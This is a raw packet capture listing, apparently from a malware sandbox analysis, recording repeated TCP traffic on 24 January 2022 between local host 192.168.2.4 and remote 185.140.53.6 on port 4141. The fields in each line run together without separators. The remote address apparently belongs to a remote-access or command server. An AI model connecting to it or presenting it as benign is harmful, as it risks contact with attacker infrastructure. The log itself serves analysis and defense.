                        Jan 24, 2022 02:25:53.682612896 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.683089018 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.683154106 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.689722061 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.689872026 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.691639900 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.691679955 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.691714048 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.691729069 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.691781998 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.691837072 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.691880941 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.691936970 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.692019939 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.692078114 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.693324089 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.693394899 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.723079920 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.723135948 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.723176003 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.723215103 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.723233938 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.723253965 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.723280907 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.723289013 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.723294020 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.723309994 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.723561049 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.723603010 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.723629951 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.723658085 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.723706007 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.723762035 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.723774910 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.723834991 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.723891020 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.723952055 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.724050045 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.724111080 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.724164009 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.724244118 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.724313974 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.724375963 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.724376917 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.724435091 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.724586964 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.724659920 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.724670887 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.724739075 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.724811077 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.724905014 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.724946976 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.724968910 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.725071907 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.725208998 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.725311041 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.725363970 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.725435972 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.725474119 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.725493908 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.725522995 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.769505024 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.793279886 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.793338060 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.793364048 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.793379068 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.793395042 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.793417931 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.793436050 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.793457985 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.793472052 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.793495893 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.793510914 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.793584108 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.793596983 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.793657064 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.793693066 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.793754101 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.793965101 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.794006109 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.794044018 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.794061899 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.804379940 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.804435015 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.804482937 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.804517031 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.804558992 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.804627895 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.804760933 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.804825068 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.809436083 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.809520960 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.809693098 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.809758902 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.821954966 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.822022915 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.835716963 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.835750103 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.835787058 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.835824013 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.836019039 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.836044073 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.836081982 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.836098909 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.836102009 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.836157084 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.836258888 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.836309910 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.836373091 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.836424112 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.836452007 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.836503029 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.836579084 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.836630106 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.836734056 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.836785078 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.836898088 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.836951017 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.836961985 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.837033987 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.837136984 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.837192059 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.837239981 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.837291956 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.837378979 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.837429047 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.837486982 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.837538958 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.837599039 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.837650061 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.837708950 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.837759018 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.856815100 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.856883049 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.863446951 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.863502979 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.863528967 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.863540888 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.863545895 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.863589048 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.863810062 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.863851070 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.863867998 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.863899946 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.863915920 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.863964081 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.864037991 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.864092112 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.886353016 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.886406898 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.886425972 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.886456013 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.886504889 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.886560917 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.886595011 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.886658907 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.886662960 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.886708975 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.886725903 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.886764050 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.886816025 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.886873960 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.887048006 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.887106895 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.887151957 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.887196064 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.887213945 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.887244940 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.887248993 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.887298107 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.887377024 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.887434006 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:53.887659073 CET414149792185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:53.887722969 CET497924141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:57.999811888 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:58.088191032 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:58.088340998 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:58.115693092 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:58.424098969 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:58.424175024 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:58.442863941 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:58.487746000 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:58.721656084 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:58.721947908 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:58.811614990 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:58.811769009 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.222198963 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.288227081 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.288428068 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.404694080 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.416980028 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.417079926 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.417172909 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.441468954 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.515830040 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.515903950 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.516005039 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.516208887 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.516266108 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.516313076 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.517193079 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.641730070 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.641786098 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.641860962 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.651268005 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.651421070 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.651505947 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.651602030 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.747158051 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.747251034 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.747327089 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.747533083 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.747575998 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.747637033 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.747976065 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.748014927 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.748071909 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.748081923 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.748110056 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.748161077 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.748346090 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.748498917 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.748660088 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.748723030 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.748754025 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.750427008 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.806168079 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.948587894 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.948647976 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.948688030 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.948729038 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.948743105 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.948765039 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.948790073 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.948796988 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.948815107 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.948836088 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.948892117 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.948932886 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.948986053 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.949245930 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.949287891 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.949326038 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.949347973 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.949381113 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.949438095 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.949598074 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.949639082 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.949659109 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.949683905 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.949795961 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.949856997 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.949991941 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.950030088 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.950082064 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.950108051 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.950153112 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.950279951 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.952868938 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.952909946 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.952941895 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.952960968 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.953001976 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.953049898 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.953182936 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.953244925 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.953414917 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.953457117 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.953471899 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.953495979 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:59.953510046 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:59.953543901 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.004153013 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.046701908 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.046746016 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.046777010 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.046803951 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.048724890 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.048764944 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.048785925 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.048796892 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.048810005 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.048837900 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.059402943 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.059467077 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.059510946 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.059544086 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.059571028 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.059581041 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.059681892 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.059731960 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.059869051 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.059910059 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.059912920 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.059950113 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.060044050 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.060091019 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.060146093 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.060192108 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.060216904 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.060257912 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.060334921 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.060378075 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.060477972 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.060667038 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.060714960 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.060775042 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.060818911 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.060847044 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.060888052 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.061023951 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.061067104 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.061108112 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.061151028 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.066766977 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.066824913 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.066842079 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.066865921 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.066871881 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.066905975 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.066957951 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.066997051 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.067003012 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.067037106 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.067159891 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.067205906 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.067285061 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.067328930 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.067477942 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.067517042 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.067528009 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.067558050 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.067708969 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.067755938 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.067815065 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.067872047 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.067883015 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.067926884 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.068067074 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.068115950 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.068156958 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.068202972 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.068280935 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.068324089 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.068409920 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.068459988 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.068521023 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.068569899 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.068939924 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.068978071 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.068989038 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.069020033 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.069161892 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.069200993 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.069207907 CET498104141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:00.069240093 CET414149810185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:00.069243908 CET498104141192.168.2.4185.140.53.6
